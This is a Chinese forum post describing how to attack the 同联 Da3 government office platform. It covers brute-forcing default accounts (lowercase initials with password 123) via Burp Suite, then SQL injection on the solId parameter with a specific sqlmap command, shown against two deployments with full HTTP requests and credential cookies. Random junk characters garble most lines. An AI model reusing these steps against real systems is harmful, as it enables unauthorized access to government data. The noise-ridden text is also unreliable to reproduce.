|
, O0 i! n/ d5 n# |
- e1 I, p& A' W- o7 v: f
1 K9 O7 E, d5 F
/ L3 M; X0 C. ] 平台简介:) v3 @; l. o5 I6 `) D7 u
2 i3 [8 Q! D- P: u
5 {+ `* G8 f$ N: g: V/ ?
) s |% j" c: ^0 w
6 X7 c; v$ v4 w1 i% w- l
% W3 ?7 H! }6 z- k. D 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
9 S) i8 ~; Q" R- A& D; p/ X
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
. C \5 P! _7 f9 s v t7 H: n同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
7 `$ \$ r0 B* G
" J+ m4 Y% T; J; h, \0 N3 ^- X3 L4 d Q5 z8 C& W# I' C
! y6 r. Z4 F) H7 b, [ s5 o& m 9 B/ J0 a+ v" n- Q. V
, ]: h2 Z) u; Q 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:2 w# C' |% U8 W& ]) y
( Q. Q+ [% w6 O4 ^( o
6 }: ], V5 W7 {# o; Z& @5 f( ]
/ i1 ?, L1 c# q3 ^& x1 Q, R
1 s% ?1 H9 a4 o3 H0 K; e# L5 b4 ]
- {% j8 F4 m* C7 }0 [: P http://1.1.1.1:7197/cap-aco/#(案例2-)
) ?' T( O: L J! P
0 w$ S% q+ o* {* ~0 ]8 [4 K
& |8 [* e# R, e& o http://www.XXOO.com (案例1-官网网站). w- S! U, c' Q: {! C
" d; c, _0 p5 y( m2 i3 C. ]1 q( ?7 b3 M4 i' J! J
+ m* O$ b0 I% q8 x; p( ?- O# U
9 Y1 o8 a' Q ^' |
, y! c0 ^8 H9 X 漏洞详情:
6 C2 I3 i+ J! b7 Q# {; a
* e2 o. C8 V9 `% d3 \: _/ \8 H1 v7 U/ h a
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试9 c9 w8 o' q- e' i' A
G# T- e) D6 _% i
8 v. P/ m$ U. ? N" E9 C$ Z
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
8 ~+ U! w1 }4 Z. O& E, d, Y 0 B; g. h3 W6 N
; a2 V" M) T" A9 n y8 j5 C( @2 |6 l
" X: p* _+ Y1 I* u$ q+ J% ?9 @2 V2 T7 N) A
$ K+ E' [% z* ~( d8 `$ g0 n$ z ) _* j+ ~1 a# I4 I) H7 `( ^0 m2 z. Q
8 X, R9 Z5 e+ f, c, C7 t+ j# G' G$ O
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:4 q% n0 ^4 E! k7 h
4 S1 J9 H# k0 N9 E$ a1 F$ G* Q/ M8 i# P# b ~! {
1、案例1-官方网站
! X3 S, a, l( |3 P ! G4 B0 H- R$ M% j6 c
; C' I/ R' X7 {4 d) P* U
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.19 q1 M3 o9 m! p: l) \
$ a& w p0 s$ o# g* n0 k/ P3 i7 H
Host: www.XXOO.com" d+ W4 c% k5 f- \! p
0 w$ U. A( V2 ~7 U4 z- T
7 V9 i; X8 M$ p2 B
Proxy-Connection: Keep-Alive
. d, b/ s. O; ~. Q* \
" i0 D `% k$ H/ e. M8 [ d* }) b8 ~& A3 {$ M$ T7 v7 f
Accept: application/json, text/javascript, */*; q=0.01
9 M+ S6 j' H" r% N8 s; @. l! Y
% v2 T3 }( F! \" B% ]3 P8 m+ I, S
Accept-Language: zh-CN! c3 \% v/ m& ~. ^3 J4 z c
% j$ R! _8 Y8 i( X3 t
e, n! J* E) M2 z Content-Type: application/json
/ w- J! W& G4 i6 W0 f
! P. f! S- a4 X. r! S+ X$ }7 ~+ j$ v% _: `0 g; q9 L" m- r3 \$ Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
6 X- S: Z! ~1 f; u 7 m' v5 ^3 Z0 [2 \
( H# l1 H" i4 Q. ~" { X-Requested-With: XMLHttpRequest
7 l' Y7 t2 Q4 v5 ~2 d + W) Z( t2 m6 q$ I' X% |: S1 l
6 i1 |. e# o% Q6 H: X! z# }' K. c/ G Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002 P! x3 ^6 l1 c8 G2 e4 V% |2 X
1 l& w' l& j/ W; E, m0 h" O
0 x; ~4 o; G2 n Accept-Encoding: gzip, deflate, sdch. W. _# [. O8 ]( q; N* L+ F! t
8 C8 m, s: s$ h) ]( L3 y1 m- C2 f F% u4 }1 P
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
( e; u7 f. ~. m8 P6 a
3 P/ R, o& u2 @% O) M3 v: H0 ~9 v( \) ~& A. B
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
- c3 ]- d- p8 Q. l" t
d8 s; o4 u: `) d! \. E: u/ K) e1 E' |- @
 , o0 e# i+ z1 u. r8 ]1 i. s \
6 v& `7 k0 ?4 R6 b
4 _$ c! g& q# v; A( x 
6 O. y4 u: F* q% { ' {' b0 p6 J4 k, n- K
7 l9 a8 |1 V! H3 i `" N* X5 ]
* B9 z/ a$ u. C' ?+ p% P
9 v5 ~) c% n& E( {" @
3 U1 F' Q# e1 d% j - T2 C" T0 d2 m' p, c1 }* G
% A( n. p# W7 x. S) I4 q
$ u" x2 D# |' [( D2 N7 r
7 {/ T: ?! D( u b$ M 9 J. G- H7 |/ J2 E @
5 I; c, V( D$ @9 J! e8 r
2、案例2-某天河云平台
; n: m9 O+ F( B7 a8 @6 n7 f
# ~9 ?* O3 W. S) C7 B( a- N" R
4 T# `9 o! A7 o GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1! L! O0 s4 N0 f3 x: n) A
; {' x# }# e& S0 d
" [/ U f* N" ?$ [ Host: 1.1.1.:7197
9 [" g; }: B8 k* b) g) R
6 M) ^1 Q5 u- G0 [% ^- z
" D) m- @- s9 P7 p$ H Accept: application/json, text/javascript, */*; q=0.01
# I- r0 \2 Y; y l; \4 g- g 4 H" m! ?8 a1 D2 g
! w) [0 M1 W; N3 E5 K& M7 p$ B% S
X-Requested-With: XMLHttpRequest
9 U$ q- R% `. y5 N" G0 _# R8 P ) \* e' l- y1 r
7 f$ Z7 j9 I8 w. l$ @ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
. S+ p) g% }3 e+ W: Y 7 U2 E9 d" u1 m6 I
6 J) d) E( Q, n Content-Type: application/json
1 E# l9 C# a) m! h4 O% q' P4 X+ C ! ^6 W: j. N% J+ n
3 P; q$ E) V! f G1 K
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
0 p7 A* o& v/ j; t: F7 J
/ e* }8 b# R* M! r9 d- ]
) B6 j, ?0 n; o* l' j Accept-Language: zh-CN,zh;q=0.89 A$ i N# s- l! C
* b; [ V- U* Y8 w& I# `# B
* P; V9 H. `" Y. K3 u
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1# E3 Q3 `8 E+ k5 b2 p
* {' [' A8 J( j. |: O$ P
! }* l' { }. n Y1 t9 T- ]6 f Connection: close
' i' g5 h! \3 A2 ]' y8 T
5 w2 z+ M3 F2 s; S L C% |& u! q, \, D9 G, d1 o( b3 i
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
: O1 [- E+ r6 {4 a& b0 ^# J ( L1 `) r) M, V) d
0 m4 t( r+ \! C0 ?0 c7 l/ b: i  # P" ]+ ?0 B7 w3 k8 C$ {
+ h" {9 y$ \7 _- y
% ~( K e' h$ h5 R" `* l
+ y! U( J0 p: b4 C6 Q | 
发表于 2018-10-20 20:15:17
收藏
支持
反对